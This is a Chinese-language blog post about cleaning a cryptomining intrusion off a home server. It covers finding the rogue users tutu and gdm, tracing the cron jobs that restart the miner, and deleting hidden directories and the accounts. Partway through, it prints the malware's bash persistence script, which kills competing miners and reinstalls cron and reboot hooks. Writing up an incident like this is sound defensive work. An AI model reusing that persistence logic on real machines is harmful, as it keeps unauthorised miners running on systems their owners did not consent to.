记一次服务器被攻破排查,清理入侵程序
说真的,没有想过家庭整的一个服务器会被攻破的,之前那个用户是啥权限的都没有的,没想要尽让让人给我破解进来,搞了一堆挖矿的程序
目前已经清理干净,所以贴的是遗留下来的截图
下面开始清理恶意程序的路线
恶意程序没法简单清理,所以需要找到源头,首先我断开了端口映射,取消该服务器连接外网的功能
使用top命令看到了两个很异常的用户,tutu和gdm,因为这两个用户我都是不用的
想要删除2这两个用户,目前是删不掉的,所以看看是不是有什么定时任务
切换到tutu用户看到
三个定时任务,难怪怎么也杀不掉
使用root账号
sudo find / -name ".*" -type d
删除
rm -rf /tmp/.ICE-unix
删除用户
最后看下现在的情况
再给一些恶意代码的分析
#!/bin/bash sleeptime=5 killminers() { pkill obama1 pkill playstation pkill xmrig ?pkill java pkill cnrig } hook1location=`cat /var/tmp/.apachee/.hook1location` apachelogslocation=`cat /var/tmp/.apachee/.apachelogslocation` while : do ?killminers ?if ! crontab -l | grep -q 'cronstart'; ?then ? ?rm -rf .tempo ??echo "* * * * * ${hook1location} > /dev/null <&1 2>&1 & disown" >> .tempo ??sleep 1 ??echo "@monthly ${hook1location} > /dev/null <&1 2>&1 & disown" >> .tempo ??sleep 1 ??echo "@reboot ${apachelogslocation} > /dev/null <&1 2>&1 & disown" >> .tempo ??crontab .tempo ??rm -rf .tempo ?fi ? ?if ! pgrep -x syst3md > /dev/null ?then ??$hook1location > /dev/null <&1 2>&1 & disown ?fi ?sleep $sleeptime done ./apachelogs
对于恶意用户可以先进行锁定
sudo passwd -l tutu
找到和用户关联的进程
ps -u tutu
删除用户
sudo userdel -r tutu
因为涉及了gdm用户,所以使用了如下的命令
停止了gdm服务
sudo systemctl stop gdm
删除gdm用户
sudo userdel -r gdm